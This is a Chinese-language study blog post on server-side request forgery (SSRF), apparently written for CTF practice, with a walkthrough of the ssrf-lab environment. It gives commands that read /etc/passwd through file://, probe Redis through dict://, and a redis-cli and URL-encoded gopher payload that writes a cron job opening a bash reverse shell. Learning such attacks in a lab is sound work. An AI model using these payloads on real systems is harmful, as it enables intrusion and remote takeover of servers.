<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="服务器端请求伪造记录">
<meta property="og:type" content="article">
<meta property="og:title" content="SSRF服务器端请求伪造">
<meta property="og:url" content="https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html">
<meta property="og:site_name" content="学习记录">
<meta property="og:description" content="服务器端请求伪造记录">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20200304115508-f0e8e08a-5dcb-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20200304115606-135773d4-5dcc-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20200304115630-214e0390-5dcc-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20200304115652-2ed303f8-5dcc-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20200304115712-3aa6359c-5dcc-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20200304115739-4a93543a-5dcc-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20200304115759-56c333ec-5dcc-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20200304115823-64fbf7b4-5dcc-1.png">
<meta property="article:published_time" content="2022-07-11T07:25:02.000Z">
<meta property="article:modified_time" content="2023-01-11T11:56:47.854Z">
<meta property="article:author" content="MirRoR4s">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20200304115508-f0e8e08a-5dcb-1.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>SSRF服务器端请求伪造</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 6.1.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/MirRoR4s">项目</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/MirRoR4s">MyGithub</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2022/07/12/%E5%8F%8D%E5%BC%B9Shell/index.html"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2022/06/25/An-Introduction-to-Mathematicl-Cryptography/index.html"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&text=SSRF服务器端请求伪造"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&title=SSRF服务器端请求伪造"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&is_video=false&description=SSRF服务器端请求伪造"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=SSRF服务器端请求伪造&body=Check out this article: https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&title=SSRF服务器端请求伪造"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&title=SSRF服务器端请求伪造"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&title=SSRF服务器端请求伪造"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&title=SSRF服务器端请求伪造"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&name=SSRF服务器端请求伪造&description=&lt;!--toc--&gt;
&lt;p&gt;服务器端请求伪造记录&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://example.com/2022/07/11/SSRF%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/index.html&t=SSRF服务器端请求伪造"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-liao-jie-ssrf"><span class="toc-number">1.</span> <span class="toc-text">0x00 了解SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ssrf-jian-jie"><span class="toc-number">1.1.</span> <span class="toc-text">SSRF简介：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssrf-lou-dong-yuan-li"><span class="toc-number">1.2.</span> <span class="toc-text">SSRF漏洞原理：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#gopher-dict-xie-yi-yi-ji-redis-fu-wu-curl-ming-ling"><span class="toc-number">1.3.</span> <span class="toc-text">gopher、dict协议以及redis服务、curl命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#chang-jian-nei-wang-ip-duan"><span class="toc-number">1.4.</span> <span class="toc-text">常见内网IP段</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssrf-lou-dong-de-wa-jue-yu-li-yong"><span class="toc-number">1.5.</span> <span class="toc-text">SSRF漏洞的挖掘与利用：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssrf-lab"><span class="toc-number">1.6.</span> <span class="toc-text">ssrf-lab</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssrf-chang-jian-rao-guo"><span class="toc-number">2.</span> <span class="toc-text">SSRF常见绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#yi-xie-sstf-ba-chang-lian-xi-ti"><span class="toc-number">3.</span> <span class="toc-text">一些SSTF靶场练习题</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ctfshow-de-ssrf-lian-xi"><span class="toc-number">3.1.</span> <span class="toc-text">ctfshow的ssrf练习</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#can-kao-lian-jie"><span class="toc-number">3.2.</span> <span class="toc-text">参考链接</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        SSRF服务器端请求伪造
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">MirRoR4s</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-07-11T07:25:02.000Z" itemprop="datePublished">2022-07-11</time>
        
        (Updated: <time datetime="2023-01-11T11:56:47.854Z" itemprop="dateModified">2023-01-11</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/CTF/" rel="tag">CTF</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <!--toc-->
<p>服务器端请求伪造记录</p>
<span id="more"></span>
<h2 id="0x00-liao-jie-ssrf"><a href="#0x00-了解SSRF" class="headerlink" title="0x00 了解SSRF"></a>0x00 了解SSRF<a href="#0x00-liao-jie-ssrf" class="header-anchor">#</a></h2><h3 id="ssrf-jian-jie"><a href="#SSRF简介：" class="headerlink" title="SSRF简介："></a>SSRF简介：<a href="#ssrf-jian-jie" class="header-anchor">#</a></h3><p>SSRF(Server-Side Request Forgery)，即服务器端请求伪造，利用漏洞伪造服务器端发起请求，从而突破客户端获取不到数据的限制，本质上是属于信息泄露漏洞。</p>
<h3 id="ssrf-lou-dong-yuan-li"><a href="#SSRF漏洞原理：" class="headerlink" title="SSRF漏洞原理："></a>SSRF漏洞原理：<a href="#ssrf-lou-dong-yuan-li" class="header-anchor">#</a></h3><p>SSRF形成的原因大都是由于服务器端提供了从其他服务器应用获取数据的功能，但是却没有对目的地址做过滤与限制。比如从指定URL地址获取网页的文本内容，加载指定地址的图片、下载等等。而且在大部分的web服务器架构中，web服务器自身是可以访问互联网和服务器所在的内网的，所以攻击者可以传入任意的地址来让后端服务器对其发起请求，并返回对该目标地址请求的数据。</p>
<p>而且在一般情况下，SSRF攻击的目标是外网无法访问的内部系统（即内网），所以SSRF漏洞也可以用一句话来进行总结：利用一个可以发起网络请求的服务器当作跳板来攻击内部其他服务。</p>
<h3 id="gopher-dict-xie-yi-yi-ji-redis-fu-wu-curl-ming-ling"><a href="#gopher、dict协议以及redis服务、curl命令" class="headerlink" title="gopher、dict协议以及redis服务、curl命令"></a>gopher、dict协议以及redis服务、curl命令<a href="#gopher-dict-xie-yi-yi-ji-redis-fu-wu-curl-ming-ling" class="header-anchor">#</a></h3><p>gopher协议可以做很多事情，特别是在SSRF中可以发挥很多重要的作用。利用此协议可以攻击内网的FTP、Telnet、Redis、Memcache，也可以进行GET、POST请求。</p>
<p>dict协议：一个字典服务器协议——A Dictionary Server Protocol，允许客户端在使用过程中访问更多字典并且该协议约定服务器端侦听端口号：2628。 协议详解：</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/kkun/archive/2009/03/28/1424052.html">https://www.cnblogs.com/kkun/archive/2009/03/28/1424052.html</a>           </p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Node-Sans-Blog/p/15118018.html">https://www.cnblogs.com/Node-Sans-Blog/p/15118018.html</a></p>
<p>redis服务是在6379端口开启的，这里大致知道一下其用处即可。</p>
<p>curl命令在SSRF漏洞有非常重要的作用，这里简单的介绍一下curl命令：</p>
<p>curl是常用的命令行工具，用来请求Web服务器。它的名字就是客户端的URL工具的意思。不带任何参数时，curl就是发出GET请求，比如：</p>
<p><code>curl https://www.example.com</code>，这个命令向<code>www.example.com</code>发出GET请求，服务器返回的内容会在命令行输出。</p>
<p>curl命令的详细说明：<a target="_blank" rel="noopener" href="http://www.ruanyifeng.com/blog/2019/09/curl-reference.html">http://www.ruanyifeng.com/blog/2019/09/curl-reference.html</a></p>
<p>此命令的<code>-v</code>参数输出通信的整个过程，用于调试。</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">使用<span class="built_in">file</span>协议 curl -v <span class="built_in">file</span>:<span class="comment">///etc/passwd</span></span><br><span class="line">使用<span class="keyword">ftp</span>协议 curl -v <span class="string">&quot;ftp://127.0.0.1:端口/info&quot;</span></span><br><span class="line">使用dict协议 curl -v <span class="string">&quot;dict://127.0.0.1:端口/info&quot;</span></span><br><span class="line">使用gopher协议 curl -v <span class="string">&quot;gopher://127.0.0.1:端口/_info&quot;</span></span><br></pre></td></tr></table></figure>
<h3 id="chang-jian-nei-wang-ip-duan"><a href="#常见内网IP段" class="headerlink" title="常见内网IP段"></a>常见内网IP段<a href="#chang-jian-nei-wang-ip-duan" class="header-anchor">#</a></h3><p>局域网地址范围分三类，以下IP段为内网IP段：</p>
<p><code>C类：192.168.0.0 - 192.168.255.255</code></p>
<p><code>B类：172.16.0.0 - 172.31.255.255</code></p>
<p><code>A类：10.0.0.0 - 10.255.255.255</code></p>
<h3 id="ssrf-lou-dong-de-wa-jue-yu-li-yong"><a href="#SSRF漏洞的挖掘与利用：" class="headerlink" title="SSRF漏洞的挖掘与利用："></a>SSRF漏洞的挖掘与利用：<a href="#ssrf-lou-dong-de-wa-jue-yu-li-yong" class="header-anchor">#</a></h3><p>存在SSTF漏洞的站点主要利用四个协议，分别是<code>http、file、gopher、dict</code>协议。</p>
<p><code>file</code>协议进行本地文件的读取</p>
<p><code>http</code>协议进行内网的ip扫描、端口探测</p>
<p>探测到<code>6379</code>端口开放，可以利用<code>http、gopher、dict</code>这几个协议来攻击开放了6379端口的redis服务。</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200304115508-f0e8e08a-5dcb-1.png" alt="img"></p>
<p>下面通过实践练习如何利用SSRF漏洞进行攻击。</p>
<p>靶场下载地址和使用教程：<a target="_blank" rel="noopener" href="https://se8s0n.github.io/2019/05/19/SSRF-LABS%E6%8C%87%E5%8D%97/">https://se8s0n.github.io/2019/05/19/SSRF-LABS%E6%8C%87%E5%8D%97/</a></p>
<h3 id="ssrf-lab"><a href="#ssrf-lab" class="headerlink" title="ssrf-lab"></a>ssrf-lab<a href="#ssrf-lab" class="header-anchor">#</a></h3><p>答案地址：</p>
<p><a target="_blank" rel="noopener" href="https://medium.com/poka-techblog/server-side-request-forgery-ssrf-attacks-part-1-the-basics-a42ba5cc244a">https://medium.com/poka-techblog/server-side-request-forgery-ssrf-attacks-part-1-the-basics-a42ba5cc244a</a></p>
<p>重要的东西<a target="_blank" rel="noopener" href="https://se8s0n.github.io/2019/05/19/SSRF-LABS%E6%8C%87%E5%8D%97/">https://se8s0n.github.io/2019/05/19/SSRF-LABS%E6%8C%87%E5%8D%97/</a></p>
<p>OUTGOING WEBHOOK 输入的<code>https://yourhandler.io/events</code>是有 REST API 监听的需要测试项目</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200304115606-135773d4-5dcc-1.png" alt="img"></p>
<p>在 SEE THE RESULT 的部分会显示请求响应的结果和状态码。下面就先测试一下<code>127.0.0.1</code>，发现有回显数据，说明这里没有对内网ip进行限制</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200304115630-214e0390-5dcc-1.png" alt="img"></p>
<p>上面了解了SSRF可以通过几种协议来进行读取文件，在这里就进行测试一下：</p>
<p>使用<code>file:///etc/passwd</code>读取用户密码,发现是可以读取</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200304115652-2ed303f8-5dcc-1.png" alt="img"></p>
<p>除此之外，利用这个协议可以读取主机内任意文件。接下来可以读取配置文件和源代码方便进一步的渗透，这里之所以成功实现是因为URL没有经过严格的过滤，所以才可以利用这个协议进行任意文件读取。</p>
<p>在上面还介绍过<code>redis</code>服务，看了很多<code>SSRF</code> 协议中的利用都是结合 Redis 服务的，所以这里就先在<code>ssrf-basics</code> 容器里面安装该服务</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">docker ps <span class="comment">#查看容器编号</span></span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">docker <span class="built_in">exec</span> -it 容器编号 /bin/bash <span class="comment">#进入容器</span></span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">apt-get install redis-server <span class="comment"># 安装redis服务</span></span></span><br><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">redis-server <span class="comment">#开启redis服务</span></span></span><br></pre></td></tr></table></figure>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200304115712-3aa6359c-5dcc-1.png" alt="img"></p>
<p>安装好之后，便可以利用协议收集信息及反弹 shell</p>
<p>利用<code>dict</code>协议，<code>dict://127.0.0.1:6379/info</code>可获取本地<code>redis</code>服务配置信息</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200304115739-4a93543a-5dcc-1.png" alt="img"></p>
<p>利用<code>dict://127.0.0.1:6379/KEYS *</code>获取 <code>redis</code> 存储的内容</p>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200304115759-56c333ec-5dcc-1.png" alt="img"></p>
<p>这就是<code>dict</code>协议的简单利用，除此之外，利用<code>gopher</code>协议可以攻击<code>redis</code></p>
<p>内网中的redis存在未授权访问漏洞，当Redis服务以root 权限运行时，利用 Gopher 协议攻击内网中的 Redis，通过写入定时任务可以实现反弹shell</p>
<p>首先先了解一下通常攻击 Redis 的命令，然后转化为 Gopher 可用的协议</p>
<figure class="highlight swift"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">redis<span class="operator">-</span>cli <span class="operator">-</span>h <span class="variable">$1</span> flushall</span><br><span class="line">echo <span class="operator">-</span>e <span class="string">&quot;<span class="subst">\n</span><span class="subst">\n</span>*/1 * * * * bash -i &gt;&amp; /dev/tcp/127.0.0.1/45952 0&gt;&amp;1<span class="subst">\n</span><span class="subst">\n</span>&quot;</span><span class="operator">|</span>redis<span class="operator">-</span>cli <span class="operator">-</span>h <span class="variable">$1</span> <span class="operator">-</span>x <span class="keyword">set</span> <span class="number">1</span></span><br><span class="line">redis<span class="operator">-</span>cli <span class="operator">-</span>h <span class="variable">$1</span> config <span class="keyword">set</span> dir <span class="operator">/</span><span class="keyword">var</span><span class="operator">/</span>spool<span class="operator">/</span>cron<span class="operator">/</span></span><br><span class="line">redis<span class="operator">-</span>cli <span class="operator">-</span>h <span class="variable">$1</span> config <span class="keyword">set</span> dbfilename root</span><br><span class="line">redis<span class="operator">-</span>cli <span class="operator">-</span>h <span class="variable">$1</span> save</span><br><span class="line"><span class="comment">//redis-cli查看所有的keys及清空所有的数据</span></span><br></pre></td></tr></table></figure>
<p>这便是常见的exp，只需自己更改IP和端口即可，改成适配于 <code>Gopher</code> 协议的 URL：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">gopher</span>://<span class="number">127.0.0.1:6379</span>/_*<span class="number">1</span>%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">8</span>%<span class="number">0</span>d%<span class="number">0</span>aflushall%<span class="number">0</span>d%<span class="number">0</span>a*<span class="number">3</span>%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">3</span>%<span class="number">0</span>d%<span class="number">0</span>aset%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">1</span>%<span class="number">0</span>d%<span class="number">0</span>a1%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">64</span>%<span class="number">0</span>d%<span class="number">0</span>a%<span class="number">0</span>d%<span class="number">0</span>a%<span class="number">0</span>a%<span class="number">0</span>a*/<span class="number">1</span> * * * * bash -i &gt;&amp; /dev/tcp/<span class="number">127.0.0.1</span>/<span class="number">45952</span> <span class="number">0</span>&gt;&amp;<span class="number">1</span>%<span class="number">0</span>a%<span class="number">0</span>a%<span class="number">0</span>a%<span class="number">0</span>a%<span class="number">0</span>a%<span class="number">0</span>d%<span class="number">0</span>a%<span class="number">0</span>d%<span class="number">0</span>a%<span class="number">0</span>d%<span class="number">0</span>a*<span class="number">4</span>%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">6</span>%<span class="number">0</span>d%<span class="number">0</span>aconfig%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">3</span>%<span class="number">0</span>d%<span class="number">0</span>aset%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">3</span>%<span class="number">0</span>d%<span class="number">0</span>adir%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">16</span>%<span class="number">0</span>d%<span class="number">0</span>a/var/www/html/%<span class="number">0</span>d%<span class="number">0</span>a*<span class="number">4</span>%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">6</span>%<span class="number">0</span>d%<span class="number">0</span>aconfig%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">3</span>%<span class="number">0</span>d%<span class="number">0</span>aset%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">10</span>%<span class="number">0</span>d%<span class="number">0</span>adbfilename%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">4</span>%<span class="number">0</span>d%<span class="number">0</span>aroot%<span class="number">0</span>d%<span class="number">0</span>a*<span class="number">1</span>%<span class="number">0</span>d%<span class="number">0</span>a$<span class="number">4</span>%<span class="number">0</span>d%<span class="number">0</span>asave%<span class="number">0</span>d%<span class="number">0</span>aquit%<span class="number">0</span>d%<span class="number">0</span>a</span><br></pre></td></tr></table></figure>
<p>将上面的复制粘贴到网页即可实现攻击。此exp经过url解码如下：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">gopher</span>://<span class="number">127.0.0.1:6379</span>/_*<span class="number">1</span> $<span class="number">8</span> flushall *<span class="number">3</span> $<span class="number">3</span> set $<span class="number">1</span> <span class="number">1</span> $<span class="number">64</span> */<span class="number">1</span> * * * * bash -i &gt;&amp; /dev/tcp/<span class="number">127.0.0.1</span>/<span class="number">45952</span> <span class="number">0</span>&gt;&amp;<span class="number">1</span> *<span class="number">4</span> $<span class="number">6</span> config $<span class="number">3</span> set $<span class="number">3</span> dir $<span class="number">16</span> /var/www/html/ *<span class="number">4</span> $<span class="number">6</span> config $<span class="number">3</span> set $<span class="number">10</span> dbfilename $<span class="number">4</span> root *<span class="number">1</span> $<span class="number">4</span> save quit</span><br></pre></td></tr></table></figure>
<p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20200304115823-64fbf7b4-5dcc-1.png" alt="img"></p>
<p>利用<code>Gopher</code> 协议还可以攻击 <code>FastCGI</code>，攻击内网 <code>Vulnerability Web</code>。具体可以参考<a target="_blank" rel="noopener" href="https://blog.chaitin.cn/gopher-attack-surfaces/">利用 Gopher 协议拓展攻击面</a></p>
<h2 id="ssrf-chang-jian-rao-guo"><a href="#SSRF常见绕过" class="headerlink" title="SSRF常见绕过"></a>SSRF常见绕过<a href="#ssrf-chang-jian-rao-guo" class="header-anchor">#</a></h2><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/11215#toc-7">https://xz.aliyun.com/t/11215#toc-7</a></p>
<h2 id="yi-xie-sstf-ba-chang-lian-xi-ti"><a href="#一些SSTF靶场练习题" class="headerlink" title="一些SSTF靶场练习题"></a>一些SSTF靶场练习题<a href="#yi-xie-sstf-ba-chang-lian-xi-ti" class="header-anchor">#</a></h2><h3 id="ctfshow-de-ssrf-lian-xi"><a href="#ctfshow的ssrf练习" class="headerlink" title="ctfshow的ssrf练习"></a>ctfshow的ssrf练习<a href="#ctfshow-de-ssrf-lian-xi" class="header-anchor">#</a></h3><p>答案：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_50589021/article/details/120183781">https://blog.csdn.net/qq_50589021/article/details/120183781</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/cosmoslin/article/details/120456960">https://blog.csdn.net/cosmoslin/article/details/120456960</a></p>
<h3 id="can-kao-lian-jie"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接<a href="#can-kao-lian-jie" class="header-anchor">#</a></h3><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7333">https://xz.aliyun.com/t/7333</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/MirRoR4s">项目</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/MirRoR4s">MyGithub</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-liao-jie-ssrf"><span class="toc-number">1.</span> <span class="toc-text">0x00 了解SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ssrf-jian-jie"><span class="toc-number">1.1.</span> <span class="toc-text">SSRF简介：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssrf-lou-dong-yuan-li"><span class="toc-number">1.2.</span> <span class="toc-text">SSRF漏洞原理：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#gopher-dict-xie-yi-yi-ji-redis-fu-wu-curl-ming-ling"><span class="toc-number">1.3.</span> <span class="toc-text">gopher、dict协议以及redis服务、curl命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#chang-jian-nei-wang-ip-duan"><span class="toc-number">1.4.</span> <span class="toc-text">常见内网IP段</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssrf-lou-dong-de-wa-jue-yu-li-yong"><span class="toc-number">1.5.</span> <span class="toc-text">SSRF漏洞的挖掘与利用：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ssrf-lab"><span class="toc-number">1.6.</span> <span class="toc-text">ssrf-lab</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssrf-chang-jian-rao-guo"><span class="toc-number">2.</span> <span class="toc-text">SSRF常见绕过</span></a></li><li class="toc-item toc-level-2"><a 